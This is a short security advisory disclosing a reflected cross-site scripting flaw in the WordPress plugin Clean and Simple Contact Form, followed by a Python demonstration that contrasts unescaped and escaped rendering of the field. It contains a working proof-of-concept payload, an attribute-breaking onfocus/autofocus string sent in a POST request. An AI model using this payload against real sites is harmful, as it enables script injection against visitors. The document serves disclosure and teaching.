Author: Ajin Abraham
Author Website: http://opensecurity.in
Affected Product: WordPress Clean and Simple Contact Form
Affected Version: <= 4.4.0
Vendor: Meg Nicholas
Vendor URL: http://www.pluginmirror.com/plugins/clean-and-simple-contact-form-by-meg-nicholas/
WP Plugin URL: https://wordpress.org/plugins/clean-and-simple-contact-form-by-meg-nicholas/

PoC:
Make a POST request to the page containing the contact form generated by "Clean and Simple Contact Form" with the following POST data:

    cscf[name]=" onfocus=alert(1) autofocus x="

Request:

    POST http://localhost/contact-us/
    cscf[name]=" onfocus=alert(1) autofocus x="

Regards,
Ajin
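To show why the payload above works and what the fix looks like, here is an added example (not the plugin's code, and not from the advisory's author). It assumes a hypothetical template that reflects the submitted cscf[name] value into the field's value="..." attribute, renders it once without and once with attribute escaping, and parses the result the way a browser would to see whether the onfocus handler survives.

```python
import html
from html.parser import HTMLParser

# Constructed stand-in for the contact form's name field: the submitted
# cscf[name] value is reflected into a value="..." attribute. This is an
# illustrative template, not the plugin's own code.
TEMPLATE = '<input type="text" name="cscf[name]" value="{value}">'

# The payload from the advisory: closes the attribute, injects an event
# handler plus autofocus, then reopens a dummy attribute so the trailing
# quote of the template stays balanced.
PAYLOAD = '" onfocus=alert(1) autofocus x="'


def render_unescaped(name: str) -> str:
    """Vulnerable rendering: raw input is concatenated into the attribute."""
    return TEMPLATE.format(value=name)


def render_escaped(name: str) -> str:
    """Hardened rendering: html.escape(quote=True) turns " into &quot;, so the
    whole string stays inside the value attribute (the role esc_attr() plays
    in WordPress code)."""
    return TEMPLATE.format(value=html.escape(name, quote=True))


class AttrCollector(HTMLParser):
    """Record the attributes of the rendered <input> tag as a browser parses them."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def parsed_attributes(markup: str) -> dict:
    parser = AttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def has_event_handler(markup: str) -> bool:
    """True if any on* attribute (e.g. onfocus) reached the parsed tag."""
    return any(k.lower().startswith("on") for k in parsed_attributes(markup))


if __name__ == "__main__":
    print(render_unescaped(PAYLOAD), has_event_handler(render_unescaped(PAYLOAD)))
    print(render_escaped(PAYLOAD), has_event_handler(render_escaped(PAYLOAD)))
```

The unescaped rendering yields separate onfocus and autofocus attributes, while the escaped rendering yields a single value attribute whose decoded content is the original payload string.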